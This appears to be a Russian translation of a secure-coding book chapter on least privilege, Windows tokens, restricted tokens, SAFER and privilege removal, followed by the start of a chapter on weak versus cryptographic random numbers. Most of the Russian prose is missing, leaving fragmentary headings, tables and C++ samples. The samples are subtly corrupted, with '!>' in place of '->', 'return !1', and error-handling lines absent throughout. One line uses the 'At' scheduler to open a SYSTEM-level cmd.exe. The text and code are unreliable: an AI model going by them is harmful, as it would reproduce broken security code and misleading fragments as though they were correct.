1: ,
,
: , , , Active Directory,
. ., ,
. , Windows
, ,
. 72.
192
II
7-2.
, -

.

2: ,
API-
,
(. 73).
7-3.
Windows
CreateFile () c
FILE_FLAG_BACKUP_SEMANTICS

SeBackupPrivilege
LogonUser
SeTcbPrivilege ( Windows XP
Windows .NET Server 2003
)
SetTokenInformation

SeTcbPrivilege
ExitWindowsEx
SeShutdownPrivilege
OpenEventLog
SeSecurityPrivilege
BroadcastSystemMessage[Ex]

(BSM_ALLDESKTOPS)
SeTcbPrivilege
SendMessage PostMessage

SeTcbPrivilege
RegisterLogonProcess
SeTcbPrivilege
InitiateSystemShutdown[Ex]

SeShutdownPrivilege
SetSystemPowerState

SeShutdownPrivilege
GetFileSecurity

SeSecurityPrivilege
7-3.
193
()
,
DebugActiveProcess
ReadProcessMemory
SeDebugPrivilege
CreateProcessAsUser

CreatePrivateObjectSecurityEx

SeSecurityPrivilege
SetSystemTime

SeSystemtimePrivilege
VirtualLock AllocateUserPhysicalPages

SeLockMemoryPrivilege

,
NetUserAdd NetLocalGroupDel

,
Administrators ()
Account Operators ( )
NetJoinDomain
SeMachineAccountPrivilege
, Windows
(wrappers) COM.
, , , ,
Windows.
3: ,
, .
,
.
,
.
.
:
!
4:
, SID ,
.
, RunAs
. ,
:
RunAs /user:MyMachine\Administrator cmd.exe
194
II
( )
, ,
, .
, ,
SYSTEM,
. ,
17:01,
, :
At 17:02 /INTERACTIVE "cmd.exe"

Local
System.
, , ,
MyToken.cpp.
.
/*
MyToken.cpp
*/
#define SECURITY_WIN32
#include "security.h"
#include "strsafe.h"
#define MAX_NAME 256
//
// . .
LPVOID AllocateTokenInfoBuffer(
HANDLE hToken,
TOKEN_INFORMATION_CLASS InfoClass,
DWORD *dwSize) {
*dwSize=0;
GetTokenInformation(
hToken,
InfoClass,
NULL,
*dwSize, dwSize);
return new BYTE[*dwSize];
}
// () .
void GetUserNames() {
EXTENDED_NAME_FORMAT enf[] = {NameDisplay,
NameSamCompatible,NameUserPrincipal};
for (int i=0; i < sizeof(enf) / sizeof(enf[0]); i++) {
char szName[128];
DWORD cbName = sizeof(szName);
if (GetUserNameEx(enf[i],szName,&cbName))
printf(" (format %d): %s\n",enf[i],szName);

}
}
// SID SID.
void GetAllSIDs(HANDLE hToken, TOKEN_INFORMATION_CLASS tic) {
DWORD dwSize = 0;
TOKEN_GROUPS *pSIDInfo = (PTOKEN_GROUPS)
AllocateTokenInfoBuffer(
hToken,
tic,
&dwSize);
if (!pSIDInfo) return;
if (!GetTokenInformation(hToken, tic, pSIDInfo, dwSize, &dwSize))
printf("GetTokenInformation Error %u\n", GetLastError());
if (!pSIDInfo!>GroupCount)
printf("\t!\n");
for (DWORD i=0; i < pSIDInfo!>GroupCount; i++) {
SID_NAME_USE SidType;
char lpName[MAX_NAME];
char lpDomain[MAX_NAME];
DWORD dwNameSize = MAX_NAME;
DWORD dwDomainSize = MAX_NAME;
DWORD dwAttr = 0;
if (!LookupAccountSid(
NULL,
pSIDInfo!>Groups[i].Sid,
lpName, &dwNameSize,
lpDomain, &dwDomainSize,
&SidType)) {
if (GetLastError() == ERROR_NONE_MAPPED)
StringCbCopy(lpName, sizeof(lpName), "NONE_MAPPED");
else
printf("LookupAccountSid Error %u\n", GetLastError());
} else
dwAttr = pSIDInfo!>Groups[i].Attributes;
printf(%12s\\%!20s\t%s\n",
lpDomain, lpName,
(dwAttr & SE_GROUP_USE_FOR_DENY_ONLY) ? " [DENY]" : " ");
}
delete [] (LPBYTE) pSIDInfo;
}
// .
195
196
II
void GetPrivs(HANDLE hToken) {

DWORD dwSize = 0;
TOKEN_PRIVILEGES *pPrivileges = (PTOKEN_PRIVILEGES)
AllocateTokenInfoBuffer(hToken,
TokenPrivileges, &dwSize);
if (!pPrivileges) return;
BOOL bRes = GetTokenInformation(
hToken,
TokenPrivileges,
pPrivileges,
dwSize, &dwSize);
if (FALSE == bRes)
printf("GetTokenInformation \n");
for (DWORD i=0; i < pPrivileges! >PrivilegeCount; i++) {
char szPrivilegeName[128];
DWORD dwPrivilegeNameLength=sizeof(szPrivilegeName);
if (LookupPrivilegeName(NULL,
&pPrivileges!>Privileges[i].Luid,
szPrivilegeName,
&dwPrivilegeNameLength))
printf("\t%s (%lu)\n",
szPrivilegeName,
pPrivileges!>Privileges[i].Attributes);
else
printf("LookupPrivilegeName ! %lu\n",
GetLastError());
}
delete [] (LPBYTE) pPrivileges;
}
int wmain( ) {
if (!ImpersonateSelf(SecurityImpersonation)) {
printf("ImpersonateSelf Error %u\n", GetLastError());
return !1;
}
HANDLE hToken = NULL;
if (!OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY,&hToken)) {
printf("OpenThreadToken Error %u\n", GetLastError());
return !1;
}
printf("\nUser Name\n");
GetUserNames();
197
printf("\nSIDS\n");
GetAllSIDs(hToken,TokenGroups);
printf("\nRestricting SIDS\n");
GetAllSIDs(hToken,TokenRestrictedSids);
printf("\nPrivileges\n");
GetPrivs(hToken);
RevertToSelf();
CloseHandle(hToken);
return 0;
}
MyToken.cpp Secureco2\Chapter07
.
, SID, SID .
GetUser, GetAllSIDs GetPrivs.
GetAllSIDs: SID.
( )
.
, , SID
( [DENY]).

,
, OpenProcessToken.

, Token Master
(Jeffrey Richter) (Jason Clark) Programming ServerSide
Applications for Microsoft Windows 2000 (Microsoft Press, 2000) ( ., . .
Microsoft Windows 2000. .:
; .: , 2001)
. Token Master
,

(. 72).
Token Information SID ,
SID .
. , MyToken.cpp
:
User
SIDS
NORTHWINDTRADERS\blake
NORTHWINDTRADERS\Domain Users
\Everyone
BUILTIN\Administrators
BUILTIN\Users
198
II
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
Restricting SIDS
None
Privileges
SeChangeNotifyPrivilege (3)
SeSecurityPrivilege (0)
SeBackupPrivilege (0)
SeRestorePrivilege (0)
SeSystemtimePrivilege (0)
SeShutdownPrivilege (0)
SeRemoteShutdownPrivilege (0)
SeTakeOwnershipPrivilege (0)
SeDebugPrivilege (0)
SeSystemEnvironmentPrivilege (0)
SeSystemProfilePrivilege (0)
SeProfileSingleProcessPrivilege (0)
SeIncreaseBasePriorityPrivilege (0)
SeLoadDriverPrivilege (2)
SeCreatePagefilePrivilege (0)
SeIncreaseQuotaPrivilege (0)
SeUndockPrivilege (2)
SeManageVolumePrivilege (0)
. 72. Cmd.exe,
SYSTEM
199

, . 74.
7-4.
SE_PRIVILEGE_USED_FOR_ACCESS
0x80000000
SE_PRIVILEGE_ENABLED_BY_DEFAULT
0x00000001
SE_PRIVILEGE_ENABLED
0x00000002
5:
SID-
: ,
SID ,
, .
, 1 2, 4
. SID ,
, .
SID, Users
() Everyone (), .
.
ACL,
, !
,
, .
.
6:
.
:
,
, ;
(restricted tokens);
.
.

,
. , 95%
, .
200
II
,
, Windows
PrivilegeCheck.
, ,
.
! ,
,
.
, .

. ,
,
. :

.

.
,
.
Web, SYSTEM,

. ,
,
SYSTEM. ,
,
:
;
Windows
;

. ,
!

.
, .
,
. SYSTEM
,
,
SYSTEM. ( , )
RevertToSelf,
, SYSTEM.
, RevertToSelf
201
. , , IIS 5. Web
, , [
(High) (Medium) ].
IWAM_<_>.
IIS [ (Low)
], SYSTEM.
,
,
. , IIS 6
, SYSTEM, ,
SYSTEM Web, .

Windows 2000/XP .
(restricted) ,
CreateRestictedToken.

, ,
. CreateRestictedToken
:
;
SID (restricting SID);
SID (deny
only attribute).

:
. .
SID
,
SID.
,
SID ,
.
SID. ACL
Everyone () , Administrators ()
, . .

, .
Brian, .
:
Everyone ();
Authenticated Users ( );
Administrators ();
Marketing.
202
II
,
()
Everyone.
. Brian
, ,
, SID. (
Administrators, ), .
SID, SID Everyone
, Everyone
.
SID,
, (AND)
SID, .

SID.
SID
(denyonly SID)
.
. ACL Marketing ACE Deny:
Full Controll (: ), SID
Marketing, . ACE
Marketing Allow: Read (: ), SID
Marketing ,
.
, , , . 75
.
7-5.
SID ACL
ACL
Marketing
Allow: Read
ACL
Marketing
Deny: Full Control

SID
Marketing

ACE

SID Marketing

ACE
ACL

ACE-
Marketing
: SID
, SID
. . ACL
Marketing. SID Marketing
, , , ,
203
! SID
.

,
.
,
SID , .
, ,
SID .
Windows 2000/XP .
,
, SID. ,
Authenticated
Users, SID Authenticated Users.
, ,
( ).
,
,
. : (, )
( ).
ShellExecute CreateProcess
, .
-,
CreateProcessAsUser,
.
ImpersonateLoggedOnUser SetThreadToken ,

.
, ,
: , SeChange
NotifyPrivilege ( ).
DISABLE_MAX_PRIVILEGE,
, SID
.
/*
Restrict.cpp
*/
// SID BUILTIN\Administrators.
BYTE sidBuffer[256];
PSID pAdminSID = (PSID)sidBuffer;
SID_IDENTIFIER_AUTHORITY SIDAuth = SECURITY_NT_AUTHORITY;
If (!AllocateAndInitializeSid( &SIDAuth, 2,
SECURITY_BUILTIN_DOMAIN_RID ,
204
II
DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0,
&pAdminSID) ) {
printf("AllocateAndInitializeSid Error %u\n", GetLastError() );
return !1;
}
// SID SID.
SID_AND_ATTRIBUTES SidToDisable[1];
SidToDisable[0].Sid = pAdminSID;
SidToDisable[0].Attributes = 0;
// .
HANDLE hOldToken = NULL;
if (!OpenProcessToken(
GetCurrentProcess(),
TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE |
TOKEN_QUERY | TOKEN_ADJUST_DEFAULT,
&hOldToken)) {
printf("OpenProcessToken (%lu)\n", GetLastError() );
return !1;
}
// .
HANDLE hNewToken = NULL;
if (!CreateRestrictedToken(hOldToken,
1, SidToDisable,
0, NULL,
0, NULL,
&hNewToken)) {
printf("CreateRestrictedToken (%lu)\n", GetLastError() );
return !1;
}
if (pAdminSID)
FreeSid(pAdminSID);
//
// .
PROCESS_INFORMATION pi;
STARTUPINFO si;
ZeroMemory(&si, sizeof(STARTUPINFO) );
si.cb = sizeof(STARTUPINFO);
si.lpDesktop = NULL;
// Cmd.exe, ,
// "" Cmd.exe.
char szSysDir[MAX_PATH+1];
if (GetSystemDirectory(szSysDir,MAX_PATH)) {
char szCmd[MAX_PATH+1];
if (StringCchCopy(szCmd,MAX_PATH,szSysDir) == S_OK &&
205
StringCchCat(szCmd,MAX_PATH,"\\") == S_OK &&

StringCchCat(szCmd,MAX_PATH,"cmd.exe") == S_OK) {
if(!CreateProcessAsUser(
hNewToken,
szCmd, NULL,
NULL,NULL,
FALSE, CREATE_NEW_CONSOLE,
NULL, NULL,
&si,&pi))
printf("CreateProcessAsUser (%lu)\n",
GetLastError() );
}
}
CloseHandle(hOldToken);
CloseHandle(hNewToken);
return 0;

SID . IsTokenResticted ,
.
! Restrict.cpp STARTUPINFO.IpDesktop (
NULL) winsta0\\default.
(Terminal Server)
, Terminal Server,
.
Secureco2\Chapter07.

.

( MyToken.cpp),
. , SID Administrators
(denyonly), , SeChangeNotifyPrivilege, .
User
SIDS
NORTHWINDTRADERS\Domain Users
\Everyone
BUILTIN\Administrators
[DENY]
BUILTIN\Users
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
Restricting SIDS
None
206
II
Privileges
SeChangeNotifyPrivilege (3)
, .
.
.
ThreadFunc; ,
Bypass Traverse hecking, DoThreadWork.
DWORD WINAPI ThreadFunc(LPVOID lpParam) {
DWORD dwErr = 0;
try {
if (!ImpersonateSelf(SecurityImpersonation))
HANDLE hThread = GetCurrentThread();
if (!OpenThreadToken(hThread,
TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE |
TOKEN_QUERY | TOKEN_IMPERSONATE,
TRUE,
&hToken))
HANDLE hNewToken = NULL;
if (!CreateRestrictedToken(hToken,
0, NULL,
0, NULL,
0, NULL,
&hNewToken))
if (!SetThreadToken(&hThread, hNewToken))
// DoThreadWork "" .
DoThreadWork(hNewToken);
} catch(DWORD d) {
dwErr = d;
}
if (dwErr == 0)
RevertToSelf();
return dwErr;
}
207
void main() {
HANDLE h = CreateThread(NULL, 0,
(LPTHREAD_START_ROUTINE)ThreadFunc,
NULL, CREATE_SUSPENDED, NULL);
if (h)
ResumeThread(h);
}
Windows XP
Windows XP Software Restriction
Policies ( ), SAFER,
.
SAFER, .
SAFER
Windows XP, Software Restriction Policies (
).
SAFER ( Winsafer.h),
. SaferCompute
TokenFromLevel. , ,
.

NormalUser, , Administrators
(), Power Users ( ).
Secureco2\Chapter07. MyTo
ken.cpp SID .
/*
SAFER.cpp
*/
#include <WinSafer.h>
#include <winnt.h>
#include <stdio.h>
#include <strsafe.h>
void main() {
SAFER_LEVEL_HANDLE hAuthzLevel;
//
//
//
//
//
//

SAFER_LEVELID_FULLYTRUSTED
SAFER_LEVELID_NORMALUSER
SAFER_LEVELID_CONSTRAINED
SAFER_LEVELID_UNTRUSTED
SAFER_LEVELID_DISALLOWED
SAFER:
( )
()
()
()
()
// .
if (SaferCreateLevel(SAFER_SCOPEID_USER,
SAFER_LEVELID_NORMALUSER,
0, &hAuthzLevel, NULL)) {
208
II
// .
if (SaferComputeTokenFromLevel(
hAuthzLevel, // .
NULL,
// NULL.
&hToken,
// .
0,
// .
NULL)) {
// .
// Cmd.exe , ,
// "" Cmd.exe
char szPath[MAX_PATH+1], szSysDir[MAX_PATH+1];
if (GetSystemDirectory(szSysDir, sizeof (szSysDir))) {
StringCbPrintf(szPath,
sizeof (szPath),
"%s\\cmd.exe",
szSysDir);
STARTUPINFO si;
ZeroMemory(&si, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
si.lpDesktop = NULL;
PROCESS_INFORMATION pi;
if (!CreateProcessAsUser(
hToken,
szPath, NULL,
NULL, NULL,
FALSE, CREATE_NEW_CONSOLE,
NULL, NULL,
&si, &pi))
printf("CreateProcessAsUser (%lu)\n",
GetLastError() );
}
}
SaferCloseLevel(hAuthzLevel);
}
}
SAFER

. SAFER,
, ,
.

. ,
,
,
SAFER.
209

Windows Security Push ( Microsoft
, )
Windows .Net Server 2003
. SAFER:
,
. ,
: , .
,
.
.
// RemPriv
#ifndef SE_PRIVILEGE_REMOVED
#define SE_PRIVILEGE_REMOVED (0x00000004)
#endif
DWORD RemovePrivs(LPCTSTR szPrivs[], DWORD cPrivs) {
HANDLE hProcessToken = NULL;
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
&hProcessToken))
return GetLastError();
DWORD cbBuff = sizeof TOKEN_PRIVILEGES +
(sizeof LUID_AND_ATTRIBUTES * cPrivs);
char *pbBuff = new char[cbBuff];
PTOKEN_PRIVILEGES pTokPrivs = (PTOKEN_PRIVILEGES)pbBuff;
// .
pTokPrivs!>PrivilegeCount = cPrivs;
for (DWORD i=0; i < cPrivs; i++) {
LookupPrivilegeValue(NULL,szPrivs[i],
&(pTokPrivs!>Privileges[i].Luid));
pTokPrivs!>Privileges[i].Attributes = SE_PRIVILEGE_REMOVED;
}
// .
BOOL fRet = AdjustTokenPrivileges(hProcessToken,
FALSE,
pTokPrivs,
0,
NULL,
NULL);
DWORD dwErr = GetLastError();
#ifdef _DEBUG
printf("AdjustTokenPrivileges() !> %d\nGetLastError() !> %d\n",
fRet,
210
II
dwErr);
#endif
if (pbBuff) delete [] pbBuff;
CloseHandle(hProcessToken);
return dwErr;
}
int main(int argc, CHAR* argv[]) {
LPCTSTR szPrivs[] = {SE_TAKE_OWNERSHIP_NAME, SE_DEBUG_NAME};
if (RemovePrivs(szPrivs,
sizeof(szPrivs)/sizeof(szPrivs[0])) == 0) {
// ! !
}
}
AdjustTokenPrivileges, ,
SE_PRIVILIGE_REMOVED. :
,
.
,
.
Windows .NET Server 2003 ,
, .
, Win
dows .NET Server 2003, GetVer
sionEx .
, Windows .NET Server 2003 LSA (LSASS.EXE)
, :
SeTakeOwnershipPrivilege;
SeCreatePagefilePrivilege;
SeLockMemoryPrivilege;
SeAssignPrimaryTokenPrivilege;
SeIncreaseQuotaPrivilege;
SeIncreaseBasePriorityPrivilege;
SeCreatePermanentPrivilege;
SeSystemEnvironmentPrivilege;
SeUndockPrivilege;
SeLoadDriverPrivilege;
SeProfileSingleProcessPrivilege;
SeManageVolumePrivilege.
Smartcard :
SeSecurityPrivilege;
SeSystemtimePrivilege;
SeDebugPrivilege;
SeShutdownPrivilege;
SeUndockPrivilege.
211
, ,
SeChangeNotifyPrivilege, NTFS.
:
/*
JettisonPrivs.cpp
*/
#ifndef SE_PRIVILEGE_REMOVED
# define SE_PRIVILEGE_REMOVED (0x00000004)
#endif
#define SAME_LUID(luid1,luid2) \
(luid1.LowPart == luid2.LowPart && \
luid1.HighPart == luid2.HighPart)
DWORD JettisonPrivs() {
DWORD dwError = 0;
VOID* TokenInfo = NULL;
try {
if (!OpenProcessToken(
GetCurrentProcess(),
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,
&hToken))
DWORD dwSize=0;
if (!GetTokenInformation(
hToken,
TokenPrivileges,
NULL, 0,
&dwSize)) {
dwError = GetLastError();
if (dwError != ERROR_INSUFFICIENT_BUFFER)
throw dwError;
}
TokenInfo = new char[dwSize];
if (NULL == TokenInfo)
throw ERROR_NOT_ENOUGH_MEMORY;
if (!GetTokenInformation(
hToken,
TokenPrivileges,
TokenInfo, dwSize,
&dwSize))
212
II
TOKEN_PRIVILEGES* pTokenPrivs = (TOKEN_PRIVILEGES*) TokenInfo;

// .
LUID luidChangeNotify;
LookupPrivilegeValue(NULL,SE_CHANGE_NOTIFY_NAME,
&luidChangeNotify);
for (DWORD dwIndex = 0;
dwIndex < pTokenPrivs!>PrivilegeCount;
dwIndex++)
if (!SAME_LUID (pTokenPrivs!>Privileges[dwIndex].Luid,
luidChangeNotify))
pTokenPrivs!>Privileges[dwIndex].Attributes =
SE_PRIVILEGE_REMOVED;
if (!AdjustTokenPrivileges(
hToken,
FALSE,
pTokenPrivs, dwSize,
NULL, NULL))
} catch (DWORD err) {
dwError = err;
}
if (TokenInfo)
delete [] TokenInfo;
return dwError;
}

Windows XP/.NET Server 2003
Windows
, .

,
. (
SeTcbPrivilege, SID SYSTEM SID
), : ,
.
,
. Windows XP
:
(NT AUTHORITY\LocalService);
(NT AUTHORITY\NetworkService).
213

.
,
.
. , BlakeLaptop
LocalService ,
, (
). , ( )
, .
BlakeLaptop NetworkService,
BLAKELAPTOP$.
: Windows 2000/XP
,
$.
ACL ,
.
. 76 ,
Windows .NET Server 2003.
7-6.

SeCreateTokenPrivilege
SeLockMemoryPrivilege
SeMachineAccountPrivilege
SeTcbPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeDebugPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
. . .
214
II
()
7-6.
SeChangeNotifyPrivilege
SeUndockPrivilege
SeSyncAgentPrivilege
SeEnableDelegationPrivilege
, Local System ,
.
?
: NetworkService
, LocalService ,
,
.
! Local System,
,
,
NetworkService LocalService.

(impersonation)
, c .
,
.

. , Windows .NET
Server 2003 SeImpersonatePrivilege (. 77).
7-7.
#define
SE_IMPERSONATE_NAME
SeImpersonatePrivilege
29L
SID :
SYSTEM;
Administrators ();
Service ().
Everyone , Service ,
.

, .
,
.
215
,
(, RPC_C_IMP_LEVEL_IMPERSONATE RPC_C_IMP_LEVEL_DELEGATE).
(
, RPC_C_IMP_LEVEL_ANONYMOUS RPC_C_IMP_LEVEL_IDENTIFY). ,
, ,
.
, .
,
-
,
.
,

.
,
, , , .
:
Windows 95/98/Me,
Windows NT/2000/XP,
;
, ,
.
. Microsoft Windows XP
, ,
,
. ,
ACL ,
Windows XP, Windows 95/98/Me (
).
,
,
.

, Windows 95/98/Me,
Windows NT/2000/XP.
,
. , ,
, . ,
, ,
. , , ,
.
.
Unable to load (
216
II
), ,
. ,
. :
Windows Me, Windows XP

. ,
, ,
, !
C:\Program Files.
,
, .
! ,
.
.
,

:
Event Viewer ( );
RegMon ( http://www.sysinternals.com);
FileMon ( http://www.sysinternals.com).
Windows
,
.
.
,
, . ,

, . Windows 2000/XP
.
1. Mmc.exe.
2. Console1 (1) File (),
Add/Remove Snapin ( ).
3. Add/Remove Snapin ( )
Add () Add Standalone Snapin (
).
4. Group Policy ( ) Add
().
5. Select Group Policy Object ( )
Finish (). Select Group Policy Object (
) Local Computer (
).
217
6. Add Standalone Snapin ( )..

7. Add/Remove snapin ( ),
OK.
8. Local Computer Policy\Computer Configuration\Windows set
tings\Security Settings\Local Policies\Audit Policy (
\ \ Windows\
\ \ ).
9. Audit Privilege Use ( ),
Audit Privilege Use Properties (:
).
10. Success () Failure () OK.
11. . (,
.)
,
Windows, ,
:
Event Type:
Failure Audit
Event Source:
Security
Event Category: Privilege Use
Event ID:
578
Date:
5/21/2002
Time:
10:15:00 AM
User:
Computer:
CHERYL!LAP
Description:
Privileged object operation:
Object Server:
Security
Object Handle:
0
Process ID:
444
Primary User Name: BLAKE!LAP$
Primary Domain:
NORTHWINDTRADERS
Primary Logon ID: (0x0,0x3E7)
Client User Name: blake
Client Domain:
NORTHWINDTRADERS
Client Logon ID:
(0x0,0x485A5)
Privileges:
SeShutdownPrivilege
Blake ,
. ,
.
Regmon FileMon

.
: RegMon FileMon. http://www.sysinternals.com.
ACCDENIED
, ,
218
II
,
.
FAT FAT32
.
NTFS, FAT,
, . FileMon
, . ,
FAT? , GetFileSecurity SetFileSecurity
FAT, . ,

, FAT.
RegMon FileMon
. ,
, .
. 73, 74 75 (. 219221) ,
,
.
!
.
SYS
TEM . ,
?

.

. : , .
,
, , .
,
.

SYSTEM .
, :
,
, ,
.
,
.
: ,
,
.
219

.

,

. 7-4
(-
)
. 73. ,
220
II
RegMon
RegMon
:
,
ACL
.
RegMon

RegMon

RegMon

?

Full Control
Everyone
. 7-5
(-
)
. 74. ,

221
NTFS?
, ,
?
:

FileMon

FileMon
:
,
ACL
.
FileMon

FileMon
?

Full Control Everyone
,
,

,

?
,

?
. 75. ,

: ,
. :
, ,
, . ,

. , !
, .
,
,
.
,
,
, ,

.
,
.
, ,
.
: .

, (nonce)
.
223
.
, .
, ,
, .
,
.
rand
C++,
rand C. ,
C .
rand ,
. rand Rand.c
Microsoft Visual C++ 7 (C Runtime, CRT), (
):
int __cdecl rand (void) {

return(((holdrand =
holdrand * 214013L + 2531011L) >> 16) & 0x7fff);
}
(Brian Kernighan)
(Dennis Ritchie) The C Programming Language, Second Edition (Prentice
Hall PTR, 1988)* :
unsigned long int next = 1;

int rand(void)
{
next = next * 1103515245 + 12345;
return (unsigned int)(next/65536) % 32768;
}

(linear congruential function).
:
,
(
, ).
,
! , rand ,
!
.
(Donald Knuth) The Art of Computer Programming,
Volume 2: Seminumerical Algorithms (AddisonWesley, 1998) ( .
. 2. ; .: ).
rand :

. .
224
II
VBScript
73 22 29 92 19 89 43 29 99 95
: VBScript.
Randomize 4269
For i = 0 to 9
r = Int(100 * Rnd) + 1
WScript.echo(r)
Next
// C/C++
// 52 4 26 66 26 62 2 76 67 66
#include <stdlib.h>
void main() {
srand(12366);
for (int i = 0; i < 10; i++) {
int i = rand() % 100;
printf("%d ", i);
}
}
# Perl 5
# 86 39 24 33 80 85 92 64 27 82
srand 650903;
for (1 .. 10) {
$r = int rand 100;
printf "$r ";
}
// C#
// 39 89 31 94 33 94 80 52 64 31
using System;
class RandTest {
static void Main() {
Random rnd = new Random(1234);
for (int i = 0; i < 10; i++) {
Console.WriteLine(rnd.Next(100));
}
}
}
, . (, ,
,
.)
! ,
CRT rand, , .
,
.
225
, ,
, Netscape Navigator.
: ,
SSL (Secure Sockets Layer),
, SSL.
, !
BugTraq http://online.securityfocus.com/
archive/1/3791.
. , IP
CodeRed .
IP. ,
, , ,
! Web http://www.avp.ch/avpve/worms/iis/
bady.stm.

Texas Hold Em Poker ASF Software.
Reliable Software Technologies ( Cigital http://www.cigital.com)
1999 .
Borland Delphi
, rand CRT. Exploit ,
! Web
http://www.cigital.com/news/gambling.html.
Win32
: rand,
Windows,
CryptGenRandom,
.
WinCrypt.h Windows
, Windows 95 Internet Explorer 3.02
, Windows 98, Windows Me, Windows CE v3, Windows NT 4/2000/XP Win
dows .NET Server 2003.
CryptGenRandom
. 81.
, , ,
, FIPS 1862, 3.1, SHA1,
G.
CryptGenRandom [
(system entropy)], Windows 2000
, :
(GetCurrentProcessID);
(GetCurrentThreadID);
(GetTickCount);
(GetLocalTime);
226
II
CryptGenRandom()
FIPS 186
,
SHA-1
NewGenRandom()
64
RC4
MD4
SHA-1 x 4
RC4
HKLM/Software/Microsoft/
Cryptography/RNG/Seed
. 81.
Windows 2000 .
,

(Query
PerformanceCounter);
MD4 ,
, . MD4 ,
128
;
, RDTSC,
RDMSR, RDPMC ( x86
Web http://developer.intel.com/software/idap/
resources/technical_collateral/pentiumii/RDTSCPM1.HTM);
,
: Idle Process Time, Io Read Transfer Count, I/O Write Transfer Count, I/O Other
Transfer Count, I/O Read Operation Count, I/O Write Operation Count, I/O Other
Operation Count, Available Pages, Committed Pages, Commit Limit, Peak Commi
227
tment, Page Fault Count, Copy On Write Count, Transition Count, Cache Transition
Count, Demand Zero Count, Page Read Count, Page Read I/O Count, Cache Read
Count, Cache I/O Count, Dirty Pages Write Count, Dirty Write I/O Count, Mapped
Pages Write Count, Mapped Write I/O Count, Paged Pool Pages, Non Paged Pool Pages,
Paged Pool Allocated space, Paged Pool Free Space, Non Paged Pool Allocated Space,
Non Paged Pool Free Space, Free System Page Table Entry, Resident System Code
Page, Total System Driver Pages, Total System Code Pages, Non Paged Pool Lookaside
Hits, Paged Pool Lookaside Hits, Available Paged Pool Pages, Resident System Cache
Page, Resident Paged Pool Page, Resident System Driver Page, Cache/Fast Read with
No Wait, Cache/Fast Read with Wait, Cache/Fast Read Resource Missed, Cache/Fast
Read Not Possible, Cache/Fast Memory Descriptor List Read with No Wait, Cache/
Fast Memory Descriptor List Read with Wait, Cache/Fast Memory Descriptor List Read
Resource Missed, Cache/Fast Memory Descriptor List Read Not Possible, Cache/Map
Data with No Wait, Cache/Map Data with Wait, Cache/Map Data with No Wait Miss,
Cache/Map Data Wait Miss, Cache/PinMapped Data Count, Cache/PinRead with
No Wait, Cache/Pin Read with Wait, Cache/PinRead with No Wait Miss, Cache/Pin
Read Wait Miss, Cache/CopyRead with No Wait, Cache/CopyRead with Wait, Cache/
CopyRead with No Wait Miss, Cache/CopyRead with Wait Miss, Cache/Memory
Descriptor List Read with No Wait, Cache/Memory Descriptor List Read with Wait,
Cache/Memory Descriptor List Read with No Wait Miss, Cache/Memory Descriptor
List Read with Wait Miss, Cache/Read Ahead IOs, Cache/LazyWrite IOs, Cache/Lazy
Write Pages, Cache/Data Flushes, Cache/Data Pages, Context Switches, First Level
Translation Buffer Fills, Second Level Translation buffer Fills System Calls;
, :
Alignment Fix Up Count, Exception Dispatch Count, Floating Emulation Count
Byte Word Emulation Count;
, , : Current
Depth, Maximum Depth, Total Allocates, Allocate Misses, Total Frees, Free Misses,
Type, Tag Size;
, :
Context Switches, Deferred Procedure Call Count, Deferred Procedure Call Rate, Time
Increment, Deferred Procedure Call Bypass Count Asynchronous Procedure Call
Bypass Count;
, : Next
Entry Offset, Number Of Threads, Create Time, User Time, Kernel Time, Image Name,
Base Priority, Unique Process ID, Inherited from Unique Process ID, Handle Count,
Session ID, Page Directory Base, Peak Virtual Size, Virtual Size, Page Fault Count,
Peak Working Set Size, Working Set Size, Quota Peak Paged Pool Usage, Quota Paged
Pool Usage, Quota Peak Non Paged Pool Usage, Quota Non Paged Pool Usage, Page
file Usage, Peak Page file Usage, Private Page Count, Read Operation Count, Write
Operation Count, Other Operation Count, Read Transfer Count, Write Transfer Count
Other Transfer Count.
SHA1, 20
(seed value),
FIPS 1862, 3.1.
228
II
,
(
CryptGenRandom Platform SDK). ,
,
, .
CryptGenRandom :
#include <wincrypt.h>
M
HCRYPTPROV hProv = NULL;
BOOL fRet = FALSE;
BYTE pGoop[16];
DWORD cbGoop = sizeof pGoop;
if (CryptAcquireContext(&hProv,
NULL, NULL,
PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT))
if (CryptGenRandom(hProv, cbGoop, &pGoop))
fRet = TRUE;
if (hProv) CryptReleaseContext(hProv, 0);
C++ CCryptRandom ,
CryptAcquireContext ( ) CryptReleaseContext,

(Cryptographic Service Provider, CSP),
. , CcryptRandom,
.
/*
CryptRandom.cpp
*/
#include <iostream.h>
class CCryptRandom {
public:
CCryptRandom();
virtual ~CCryptRandom();
BOOL get(void *lpGoop, DWORD cbGoop);
private:
HCRYPTPROV m_hProv;
};
CCryptRandom::CCryptRandom() {
m_hProv = NULL;
CryptAcquireContext(&m_hProv,
NULL, NULL,
229
PROV_RSA_FULL, CRYPT_VERIFYCONTEXT);
if (m_hProv == NULL)
}
CCryptRandom::~CCryptRandom() {
if (m_hProv) CryptReleaseContext(m_hProv, 0);
}
BOOL CCryptRandom::get(void *lpGoop, DWORD cbGoop) {
if (!m_hProv) return FALSE;
return CryptGenRandom(m_hProv, cbGoop,
reinterpret_cast<LPBYTE>(lpGoop));
}
void main() {
try {
CCryptRandom r;
// 10 099.
for (int i=0; i<10; i++) {
DWORD d;
if (r.get(&d, sizeof d))
cout << d % 100 << endl;
}
} catch (...) {
// .
}
}
, CryptGenRandom,
, !
Crypt
AcquireContext,
, .
FIPS 140-1
FIPS 1401 (Federal Infor
mation Processing Standard)
.
. FIPS 1401 Web http://
www.microsoft.com/technet/security/FIPSFaq.asp.
, ,
, FIPS 1401.
